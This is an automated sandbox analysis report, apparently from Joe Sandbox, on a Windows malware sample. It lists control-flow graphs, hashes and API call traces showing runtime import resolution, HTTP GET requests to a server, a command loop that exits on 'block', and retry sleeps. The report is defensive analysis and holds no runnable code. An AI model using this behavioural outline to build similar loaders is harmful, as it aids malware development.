                      • Opcode ID: 54ec586eed9b4c572b3c181264093c0ccd904b9fc06a84219ddde83d9b3c2313
                      • Instruction ID: 07aaddc899efa401a5e479238e2fbce6506d8bebe267ca667b39efe58f524b6f
                      • Opcode Fuzzy Hash: 54ec586eed9b4c572b3c181264093c0ccd904b9fc06a84219ddde83d9b3c2313
                      • Instruction Fuzzy Hash: C7F04FB1D44249ABC710DFD9DD4ABEEBBB8EB04711F10425AFA05A2680C77415048BA2
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitInfoProcessSystem
                      • String ID:
                      • API String ID: 752954902-0
                      • Opcode ID: d5678e7b1cf5a102b73f1230d10f6a3beaf0db28766593282885eb45d04de94d
                      • Instruction ID: 7d801c7ade49f8edeadb0f1b9fef6ceaa6a11329d4dda0c4eea96b2acce92297
                      • Opcode Fuzzy Hash: d5678e7b1cf5a102b73f1230d10f6a3beaf0db28766593282885eb45d04de94d
                      • Instruction Fuzzy Hash: 6DD05E7890130CEBCB00DFE0D8496DDBB79FB0C321F04155AD90562380EA305581CAA6

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 633 3e9c10-3e9c1a 634 3ea036-3ea0ca LoadLibraryA * 8 633->634 635 3e9c20-3ea031 GetProcAddress * 43 633->635 636 3ea0cc-3ea141 GetProcAddress * 5 634->636 637 3ea146-3ea14d 634->637 635->634 636->637 638 3ea216-3ea21d 637->638 639 3ea153-3ea211 GetProcAddress * 8 637->639 640 3ea21f-3ea293 GetProcAddress * 5 638->640 641 3ea298-3ea29f 638->641 639->638 640->641 642 3ea337-3ea33e 641->642 643 3ea2a5-3ea332 GetProcAddress * 6 641->643 644 3ea41f-3ea426 642->644 645 3ea344-3ea41a GetProcAddress * 9 642->645 643->642 646 3ea428-3ea49d GetProcAddress * 5 644->646 647 3ea4a2-3ea4a9 644->647 645->644 646->647 648 3ea4dc-3ea4e3 647->648 649 3ea4ab-3ea4d7 GetProcAddress * 2 647->649 650 3ea515-3ea51c 648->650 651 3ea4e5-3ea510 GetProcAddress * 2 648->651 649->648 652 3ea612-3ea619 650->652 653 3ea522-3ea60d GetProcAddress * 10 650->653 651->650 654 3ea67d-3ea684 652->654 655 3ea61b-3ea678 GetProcAddress * 4 652->655 653->652 656 3ea69e-3ea6a5 654->656 657 3ea686-3ea699 GetProcAddress 654->657 655->654 658 3ea708-3ea709 656->658 659 3ea6a7-3ea703 GetProcAddress * 4 656->659 657->656 659->658
                      APIs
                      • GetProcAddress.KERNEL32(74DD0000,01075650), ref: 003E9C2D
                      • GetProcAddress.KERNEL32(74DD0000,01075910), ref: 003E9C45
                      • GetProcAddress.KERNEL32(74DD0000,01089580), ref: 003E9C5E
                      • GetProcAddress.KERNEL32(74DD0000,010895B0), ref: 003E9C76
                      • GetProcAddress.KERNEL32(74DD0000,010895E0), ref: 003E9C8E
                      • GetProcAddress.KERNEL32(74DD0000,01089598), ref: 003E9CA7
                      • GetProcAddress.KERNEL32(74DD0000,0107BED0), ref: 003E9CBF
                      • GetProcAddress.KERNEL32(74DD0000,0108D210), ref: 003E9CD7
                      • GetProcAddress.KERNEL32(74DD0000,0108D360), ref: 003E9CF0
                      • GetProcAddress.KERNEL32(74DD0000,0108D258), ref: 003E9D08
                      • GetProcAddress.KERNEL32(74DD0000,0108D1B0), ref: 003E9D20
                      • GetProcAddress.KERNEL32(74DD0000,01075890), ref: 003E9D39
                      • GetProcAddress.KERNEL32(74DD0000,01075970), ref: 003E9D51
                      • GetProcAddress.KERNEL32(74DD0000,01075710), ref: 003E9D69
                      • GetProcAddress.KERNEL32(74DD0000,01075750), ref: 003E9D82
                      • GetProcAddress.KERNEL32(74DD0000,0108D378), ref: 003E9D9A
                      • GetProcAddress.KERNEL32(74DD0000,0108D3A8), ref: 003E9DB2
                      • GetProcAddress.KERNEL32(74DD0000,0107BCF0), ref: 003E9DCB
                      • GetProcAddress.KERNEL32(74DD0000,01075790), ref: 003E9DE3
                      • GetProcAddress.KERNEL32(74DD0000,0108D2B8), ref: 003E9DFB
                      • GetProcAddress.KERNEL32(74DD0000,0108D228), ref: 003E9E14
                      • GetProcAddress.KERNEL32(74DD0000,0108D270), ref: 003E9E2C
                      • GetProcAddress.KERNEL32(74DD0000,0108D2D0), ref: 003E9E44
                      • GetProcAddress.KERNEL32(74DD0000,010757B0), ref: 003E9E5D
                      • GetProcAddress.KERNEL32(74DD0000,0108D348), ref: 003E9E75
                      • GetProcAddress.KERNEL32(74DD0000,0108D3C0), ref: 003E9E8D
                      • GetProcAddress.KERNEL32(74DD0000,0108D138), ref: 003E9EA6
                      • GetProcAddress.KERNEL32(74DD0000,0108D288), ref: 003E9EBE
                      • GetProcAddress.KERNEL32(74DD0000,0108D1C8), ref: 003E9ED6
                      • GetProcAddress.KERNEL32(74DD0000,0108D0F0), ref: 003E9EEF
                      • GetProcAddress.KERNEL32(74DD0000,0108D180), ref: 003E9F07
                      • GetProcAddress.KERNEL32(74DD0000,0108D390), ref: 003E9F1F
                      • GetProcAddress.KERNEL32(74DD0000,0108D2E8), ref: 003E9F38
                      • GetProcAddress.KERNEL32(74DD0000,0108A2E0), ref: 003E9F50
                      • GetProcAddress.KERNEL32(74DD0000,0108D300), ref: 003E9F68
                      • GetProcAddress.KERNEL32(74DD0000,0108D2A0), ref: 003E9F81
                      • GetProcAddress.KERNEL32(74DD0000,01075830), ref: 003E9F99
                      • GetProcAddress.KERNEL32(74DD0000,0108D198), ref: 003E9FB1
                      • GetProcAddress.KERNEL32(74DD0000,01075510), ref: 003E9FCA
                      • GetProcAddress.KERNEL32(74DD0000,0108D0D8), ref: 003E9FE2
                      • GetProcAddress.KERNEL32(74DD0000,0108D108), ref: 003E9FFA
                      • GetProcAddress.KERNEL32(74DD0000,01075490), ref: 003EA013
                      • GetProcAddress.KERNEL32(74DD0000,01075390), ref: 003EA02B
                      • LoadLibraryA.KERNEL32(0108D318,?,003E5CA3,003F0AEB,?,?,?,?,?,?,?,?,?,?,003F0AEA,003F0AE3), ref: 003EA03D
                      • LoadLibraryA.KERNEL32(0108D330,?,003E5CA3,003F0AEB,?,?,?,?,?,?,?,?,?,?,003F0AEA,003F0AE3), ref: 003EA04E
                      • LoadLibraryA.KERNEL32(0108D120,?,003E5CA3,003F0AEB,?,?,?,?,?,?,?,?,?,?,003F0AEA,003F0AE3), ref: 003EA060
                      • LoadLibraryA.KERNEL32(0108D1E0,?,003E5CA3,003F0AEB,?,?,?,?,?,?,?,?,?,?,003F0AEA,003F0AE3), ref: 003EA072
                      • LoadLibraryA.KERNEL32(0108D150,?,003E5CA3,003F0AEB,?,?,?,?,?,?,?,?,?,?,003F0AEA,003F0AE3), ref: 003EA083
                      • LoadLibraryA.KERNEL32(0108D168,?,003E5CA3,003F0AEB,?,?,?,?,?,?,?,?,?,?,003F0AEA,003F0AE3), ref: 003EA095
                      • LoadLibraryA.KERNEL32(0108D1F8,?,003E5CA3,003F0AEB,?,?,?,?,?,?,?,?,?,?,003F0AEA,003F0AE3), ref: 003EA0A7
                      • LoadLibraryA.KERNEL32(0108D240,?,003E5CA3,003F0AEB,?,?,?,?,?,?,?,?,?,?,003F0AEA,003F0AE3), ref: 003EA0B8
                      • GetProcAddress.KERNEL32(75290000,010754B0), ref: 003EA0DA
                      • GetProcAddress.KERNEL32(75290000,0108D4E0), ref: 003EA0F2
                      • GetProcAddress.KERNEL32(75290000,01088F40), ref: 003EA10A
                      • GetProcAddress.KERNEL32(75290000,0108D480), ref: 003EA123
                      • GetProcAddress.KERNEL32(75290000,010754F0), ref: 003EA13B
                      • GetProcAddress.KERNEL32(734C0000,0107BB38), ref: 003EA160
                      • GetProcAddress.KERNEL32(734C0000,010755F0), ref: 003EA179
                      • GetProcAddress.KERNEL32(734C0000,0107BA98), ref: 003EA191
                      • GetProcAddress.KERNEL32(734C0000,0108D408), ref: 003EA1A9
                      • GetProcAddress.KERNEL32(734C0000,0108D540), ref: 003EA1C2
                      • GetProcAddress.KERNEL32(734C0000,01075430), ref: 003EA1DA
                      • GetProcAddress.KERNEL32(734C0000,01075530), ref: 003EA1F2
                      • GetProcAddress.KERNEL32(734C0000,0108D570), ref: 003EA20B
                      • GetProcAddress.KERNEL32(752C0000,010753B0), ref: 003EA22C
                      • GetProcAddress.KERNEL32(752C0000,010754D0), ref: 003EA244
                      • GetProcAddress.KERNEL32(752C0000,0108D4F8), ref: 003EA25D
                      • GetProcAddress.KERNEL32(752C0000,0108D420), ref: 003EA275
                      • GetProcAddress.KERNEL32(752C0000,01075410), ref: 003EA28D
                      • GetProcAddress.KERNEL32(74EC0000,0107B778), ref: 003EA2B3
                      • GetProcAddress.KERNEL32(74EC0000,0107B980), ref: 003EA2CB
                      • GetProcAddress.KERNEL32(74EC0000,0108D588), ref: 003EA2E3
                      • GetProcAddress.KERNEL32(74EC0000,01075550), ref: 003EA2FC
                      • GetProcAddress.KERNEL32(74EC0000,01075570), ref: 003EA314
                      • GetProcAddress.KERNEL32(74EC0000,0107B840), ref: 003EA32C
                      • GetProcAddress.KERNEL32(75BD0000,0108D468), ref: 003EA352
                      • GetProcAddress.KERNEL32(75BD0000,01075330), ref: 003EA36A
                      • GetProcAddress.KERNEL32(75BD0000,01088E80), ref: 003EA382
                      • GetProcAddress.KERNEL32(75BD0000,0108D438), ref: 003EA39B
                      • GetProcAddress.KERNEL32(75BD0000,0108D450), ref: 003EA3B3
                      • GetProcAddress.KERNEL32(75BD0000,01075590), ref: 003EA3CB
                      • GetProcAddress.KERNEL32(75BD0000,010755B0), ref: 003EA3E4
                      • GetProcAddress.KERNEL32(75BD0000,0108D528), ref: 003EA3FC
                      • GetProcAddress.KERNEL32(75BD0000,0108D558), ref: 003EA414
                      • GetProcAddress.KERNEL32(75A70000,010755D0), ref: 003EA436
                      • GetProcAddress.KERNEL32(75A70000,0108D3D8), ref: 003EA44E
                      • GetProcAddress.KERNEL32(75A70000,0108D3F0), ref: 003EA466
                      • GetProcAddress.KERNEL32(75A70000,0108D498), ref: 003EA47F
                      • GetProcAddress.KERNEL32(75A70000,0108D510), ref: 003EA497
                      • GetProcAddress.KERNEL32(75450000,01075210), ref: 003EA4B8
                      • GetProcAddress.KERNEL32(75450000,01075450), ref: 003EA4D1
                      • GetProcAddress.KERNEL32(75DA0000,01075290), ref: 003EA4F2
                      • GetProcAddress.KERNEL32(75DA0000,0108D4B0), ref: 003EA50A
                      • GetProcAddress.KERNEL32(6F040000,01075370), ref: 003EA530
                      • GetProcAddress.KERNEL32(6F040000,010753D0), ref: 003EA548
                      • GetProcAddress.KERNEL32(6F040000,01075230), ref: 003EA560
                      • GetProcAddress.KERNEL32(6F040000,0108D4C8), ref: 003EA579
                      • GetProcAddress.KERNEL32(6F040000,01075250), ref: 003EA591
                      • GetProcAddress.KERNEL32(6F040000,01075270), ref: 003EA5A9
                      • GetProcAddress.KERNEL32(6F040000,010753F0), ref: 003EA5C2
                      • GetProcAddress.KERNEL32(6F040000,01075470), ref: 003EA5DA
                      • GetProcAddress.KERNEL32(6F040000,InternetSetOptionA), ref: 003EA5F1
                      • GetProcAddress.KERNEL32(6F040000,HttpQueryInfoA), ref: 003EA607
                      • GetProcAddress.KERNEL32(75AF0000,0108CF58), ref: 003EA629
                      • GetProcAddress.KERNEL32(75AF0000,01088EF0), ref: 003EA641
                      • GetProcAddress.KERNEL32(75AF0000,0108D000), ref: 003EA659
                      • GetProcAddress.KERNEL32(75AF0000,0108CEB0), ref: 003EA672
                      • GetProcAddress.KERNEL32(75D90000,010752B0), ref: 003EA693
                      • GetProcAddress.KERNEL32(6CFB0000,0108CFD0), ref: 003EA6B4
                      • GetProcAddress.KERNEL32(6CFB0000,01075350), ref: 003EA6CD
                      • GetProcAddress.KERNEL32(6CFB0000,0108CE80), ref: 003EA6E5
                      • GetProcAddress.KERNEL32(6CFB0000,0108CF40), ref: 003EA6FD
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc$LibraryLoad
                      • String ID: HttpQueryInfoA$InternetSetOptionA
                      • API String ID: 2238633743-1775429166
                      • Opcode ID: ef3d62f91da5be2996486a1abc11de448c9c48b81139caa4c90847bfbaa2cb17
                      • Instruction ID: dbc211897df2eabf37a169bce09328509da3d26f3c3d4174fe4ffda52001786d
                      • Opcode Fuzzy Hash: ef3d62f91da5be2996486a1abc11de448c9c48b81139caa4c90847bfbaa2cb17
                      • Instruction Fuzzy Hash: 3C624DB9502200AFC385DFE9ED889E637FBF74C31131CE61BA609C32A5D6399542DB52

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1033 3d6280-3d630b call 3ea7a0 call 3d47b0 call 3ea740 InternetOpenA StrCmpCA 1040 3d630d 1033->1040 1041 3d6314-3d6318 1033->1041 1040->1041 1042 3d631e-3d6342 InternetConnectA 1041->1042 1043 3d6509-3d6525 call 3ea7a0 call 3ea800 * 2 1041->1043 1045 3d64ff-3d6503 InternetCloseHandle 1042->1045 1046 3d6348-3d634c 1042->1046 1062 3d6528-3d652d 1043->1062 1045->1043 1048 3d634e-3d6358 1046->1048 1049 3d635a 1046->1049 1051 3d6364-3d6392 HttpOpenRequestA 1048->1051 1049->1051 1053 3d6398-3d639c 1051->1053 1054 3d64f5-3d64f9 InternetCloseHandle 1051->1054 1056 3d639e-3d63bf InternetSetOptionA 1053->1056 1057 3d63c5-3d6405 HttpSendRequestA HttpQueryInfoA 1053->1057 1054->1045 1056->1057 1059 3d642c-3d644b call 3e8940 1057->1059 1060 3d6407-3d6427 call 3ea740 call 3ea800 * 2 1057->1060 1067 3d644d-3d6454 1059->1067 1068 3d64c9-3d64e9 call 3ea740 call 3ea800 * 2 1059->1068 1060->1062 1071 3d64c7-3d64ef InternetCloseHandle 1067->1071 1072 3d6456-3d6480 InternetReadFile 1067->1072 1068->1062 1071->1054 1076 3d648b 1072->1076 1077 3d6482-3d6489 1072->1077 1076->1071 1077->1076 1080 3d648d-3d64c5 call 3ea9b0 call 3ea8a0 call 3ea800 1077->1080 1080->1072
                      APIs
                        • Part of subcall function 003EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003EA7E6
                        • Part of subcall function 003D47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003D4839
                        • Part of subcall function 003D47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 003D4849
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                      • InternetOpenA.WININET(003F0DFE,00000001,00000000,00000000,00000000), ref: 003D62E1
                      • StrCmpCA.SHLWAPI(?,0108E978), ref: 003D6303
                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003D6335
                      • HttpOpenRequestA.WININET(00000000,GET,?,0108E0E8,00000000,00000000,00400100,00000000), ref: 003D6385
                      • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003D63BF
                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003D63D1
                      • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 003D63FD
                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 003D646D
                      • InternetCloseHandle.WININET(00000000), ref: 003D64EF
                      • InternetCloseHandle.WININET(00000000), ref: 003D64F9
                      • InternetCloseHandle.WININET(00000000), ref: 003D6503
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                      • String ID: ERROR$ERROR$GET
                      • API String ID: 3749127164-2509457195
                      • Opcode ID: 673a3262c6109ffbc01912da29a61f2016142115e2933e77c2717a1d02928983
                      • Instruction ID: 7e8df21e1726f957dd3cc99bd7417c2bf948175bcfd91b989765801f7e8de2bd
                      • Opcode Fuzzy Hash: 673a3262c6109ffbc01912da29a61f2016142115e2933e77c2717a1d02928983
                      • Instruction Fuzzy Hash: 77717E71A00218EBDB25DFE1DC4ABEE7779BB44700F108199F10A6B2D4DBB46A85CF51

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1090 3e5510-3e5577 call 3e5ad0 call 3ea820 * 3 call 3ea740 * 4 1106 3e557c-3e5583 1090->1106 1107 3e55d7-3e564c call 3ea740 * 2 call 3d1590 call 3e52c0 call 3ea8a0 call 3ea800 call 3eaad0 StrCmpCA 1106->1107 1108 3e5585-3e55b6 call 3ea820 call 3ea7a0 call 3d1590 call 3e51f0 1106->1108 1133 3e5693-3e56a9 call 3eaad0 StrCmpCA 1107->1133 1138 3e564e-3e568e call 3ea7a0 call 3d1590 call 3e51f0 call 3ea8a0 call 3ea800 1107->1138 1124 3e55bb-3e55d2 call 3ea8a0 call 3ea800 1108->1124 1124->1133 1140 3e56af-3e56b6 1133->1140 1141 3e57dc-3e5844 call 3ea8a0 call 3ea820 * 2 call 3d1670 call 3ea800 * 4 call 3e6560 call 3d1550 1133->1141 1138->1133 1144 3e56bc-3e56c3 1140->1144 1145 3e57da-3e585f call 3eaad0 StrCmpCA 1140->1145 1270 3e5ac3-3e5ac6 1141->1270 1149 3e571e-3e5793 call 3ea740 * 2 call 3d1590 call 3e52c0 call 3ea8a0 call 3ea800 call 3eaad0 StrCmpCA 1144->1149 1150 3e56c5-3e5719 call 3ea820 call 3ea7a0 call 3d1590 call 3e51f0 call 3ea8a0 call 3ea800 1144->1150 1164 3e5865-3e586c 1145->1164 1165 3e5991-3e59f9 call 3ea8a0 call 3ea820 * 2 call 3d1670 call 3ea800 * 4 call 3e6560 call 3d1550 1145->1165 1149->1145 1250 3e5795-3e57d5 call 3ea7a0 call 3d1590 call 3e51f0 call 3ea8a0 call 3ea800 1149->1250 1150->1145 1171 3e598f-3e5a14 call 3eaad0 StrCmpCA 1164->1171 1172 3e5872-3e5879 1164->1172 1165->1270 1201 3e5a28-3e5a91 call 3ea8a0 call 3ea820 * 2 call 3d1670 call 3ea800 * 4 call 3e6560 call 3d1550 1171->1201 1202 3e5a16-3e5a21 Sleep 1171->1202 1180 3e587b-3e58ce call 3ea820 call 3ea7a0 call 3d1590 call 3e51f0 call 3ea8a0 call 3ea800 1172->1180 1181 3e58d3-3e5948 call 3ea740 * 2 call 3d1590 call 3e52c0 call 3ea8a0 call 3ea800 call 3eaad0 StrCmpCA 1172->1181 1180->1171 1181->1171 1275 3e594a-3e598a call 3ea7a0 call 3d1590 call 3e51f0 call 3ea8a0 call 3ea800 1181->1275 1201->1270 1202->1106 1250->1145 1275->1171
                      APIs
                        • Part of subcall function 003EA820: lstrlen.KERNEL32(003D4F05,?,?,003D4F05,003F0DDE), ref: 003EA82B
                        • Part of subcall function 003EA820: lstrcpy.KERNEL32(003F0DDE,00000000), ref: 003EA885
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003E5644
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003E56A1
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003E5857
                        • Part of subcall function 003EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003EA7E6
                        • Part of subcall function 003E51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003E5228
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                        • Part of subcall function 003E52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003E5318
                        • Part of subcall function 003E52C0: lstrlen.KERNEL32(00000000), ref: 003E532F
                        • Part of subcall function 003E52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 003E5364
                        • Part of subcall function 003E52C0: lstrlen.KERNEL32(00000000), ref: 003E5383
                        • Part of subcall function 003E52C0: lstrlen.KERNEL32(00000000), ref: 003E53AE
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003E578B
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003E5940
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003E5A0C
                      • Sleep.KERNEL32(0000EA60), ref: 003E5A1B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpylstrlen$Sleep
                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                      • API String ID: 507064821-2791005934
                      • Opcode ID: 7a4d1a6a9786bba150cdda29be91156132fd9a255e5c468635e6b027b32184ca
                      • Instruction ID: c5408be3a75b74d71798e5dcb94141594977423d09f26e077b581c2b87a8ad44
                      • Opcode Fuzzy Hash: 7a4d1a6a9786bba150cdda29be91156132fd9a255e5c468635e6b027b32184ca
                      • Instruction Fuzzy Hash: 9EE164729106549ADB06FBE1EC92AFD7739AF54300F408329B5066A1D1EF347F09CBA2

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1301 3e17a0-3e17cd call 3eaad0 StrCmpCA 1304 3e17cf-3e17d1 ExitProcess 1301->1304 1305 3e17d7-3e17f1 call 3eaad0 1301->1305 1309 3e17f4-3e17f8 1305->1309 1310 3e17fe-3e1811 1309->1310 1311 3e19c2-3e19cd call 3ea800 1309->1311 1313 3e199e-3e19bd 1310->1313 1314 3e1817-3e181a 1310->1314 1313->1309 1315 3e187f-3e1890 StrCmpCA 1314->1315 1316 3e185d-3e186e StrCmpCA 1314->1316 1317 3e1835-3e1844 call 3ea820 1314->1317 1318 3e1932-3e1943 StrCmpCA 1314->1318 1319 3e1913-3e1924 StrCmpCA 1314->1319 1320 3e1970-3e1981 StrCmpCA 1314->1320 1321 3e18f1-3e1902 StrCmpCA 1314->1321 1322 3e1951-3e1962 StrCmpCA 1314->1322 1323 3e18cf-3e18e0 StrCmpCA 1314->1323 1324 3e198f-3e1999 call 3ea820 1314->1324 1325 3e18ad-3e18be StrCmpCA 1314->1325 1326 3e1849-3e1858 call 3ea820 1314->1326 1327 3e1821-3e1830 call 3ea820 1314->1327 1340 3e189e-3e18a1 1315->1340 1341 3e1892-3e189c 1315->1341 1338 3e187a 1316->1338 1339 3e1870-3e1873 1316->1339 1317->1313 1350 3e194f 1318->1350 1351 3e1945-3e1948 1318->1351 1348 3e1926-3e1929 1319->1348 1349 3e1930 1319->1349 1332 3e198d 1320->1332 1333 3e1983-3e1986 1320->1333 1346 3e190e 1321->1346 1347 3e1904-3e1907 1321->1347 1329 3e196e 1322->1329 1330 3e1964-3e1967 1322->1330 1344 3e18ec 1323->1344 1345 3e18e2-3e18e5 1323->1345 1324->1313 1342 3e18ca 1325->1342 1343 3e18c0-3e18c3 1325->1343 1326->1313 1327->1313 1329->1313 1330->1329 1332->1313 1333->1332 1338->1313 1339->1338 1355 3e18a8 1340->1355 1341->1355 1342->1313 1343->1342 1344->1313 1345->1344 1346->1313 1347->1346 1348->1349 1349->1313 1350->1313 1351->1350 1355->1313
                      APIs
                      • StrCmpCA.SHLWAPI(00000000,block), ref: 003E17C5
                      • ExitProcess.KERNEL32 ref: 003E17D1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
